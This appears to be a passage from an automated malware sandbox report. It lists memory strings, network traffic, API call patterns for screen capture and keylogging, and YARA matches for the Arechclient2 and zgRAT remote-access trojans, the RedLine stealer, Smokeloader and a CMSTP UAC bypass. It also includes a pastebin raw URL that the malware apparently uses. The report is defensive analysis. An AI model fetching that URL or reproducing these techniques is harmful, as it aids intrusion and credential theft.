Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969256826.00000195253E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BCBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969256826.00000195253E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BCBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951C06D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2979971028.0000019529292000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://indiantypefoundry.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.azure-api.net/ent/v1
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://monitor.azure.com//.default
Source: MSBuild.exe, 0000000D.00000002.2895391729.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://profiler.monitor.azure.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://rt.services.visualstudio.com/l
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2897049550.000001950A3B5000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2979971028.0000019529292000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFL
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951C06D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLThis
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2979971028.0000019529292000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLX8
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951C06D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://snapshot.monitor.azure.com/&
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950C023000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
Source: u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u5mc.0.exe, 00000001.00000003.1743378692.00000000245BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u5mc.0.exe, 00000001.00000003.1743378692.00000000245BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://taskscheduler.codeplex.com/H
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BED9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
Source: QPoX60yhZt.exe, 00000000.00000003.1816995670.00000000075F2000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1852865451.0000000003F89000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082385125.00000000051F6000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224438521.0000000003995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000003066000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: u5mc.0.exe, 00000001.00000002.2129887694.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.000000000302F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2895391729.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950C0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/eula/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/privacy/?
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2898179431.000001950BCA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: u5mc.0.exe, 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: u5mc.0.exe, 00000001.00000003.1846905045.000000002A91C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443

Source: unknown	HTTPS traffic detected: 195.181.163.195:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49759 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

Code function: 2_2_0015C8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

2_2_0015C8B0

Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe

Code function: 2_2_6C26A5AA GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

2_2_6C26A5AA

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 21.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 24.2.MSBuild.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.cmd.exe.5c100c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 21.2.cmd.exe.4a3de64.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.run.exe.39e015b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.51fc976.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.49f9976.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.3fd415b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.run.exe.399c86d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5240e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 21.2.cmd.exe.4a3d264.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.3f9086d.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 20.2.run.exe.39e0d5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5240264.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.3fd4d5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5c100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1951bd66ca8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068b537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068c47a3.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c1432f.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509c38739.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.19509bed525.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.195068d4dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000001.00000002.2129827121.0000000004264000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1991857381.0000000004195000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2127706254.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1993808313.0000000005BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\hwfesovsnabgua, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\ougwwmmp, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA1F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6BA1F280
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA7B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6BA7B910
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA7B8C0 rand_s,NtQueryVirtualMemory,	1_2_6BA7B8C0
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA7B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6BA7B700
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BA3ED10 malloc,NtFlushVirtualMemory,memset,LdrInitializeThunk,memset,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	1_2_6BA3ED10
Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe	Code function: 1_2_6BC462C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	1_2_6BC462C0

Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\QPoX60yhZt.exe	Code function: 0_2_0041B722	0_2_0041B722
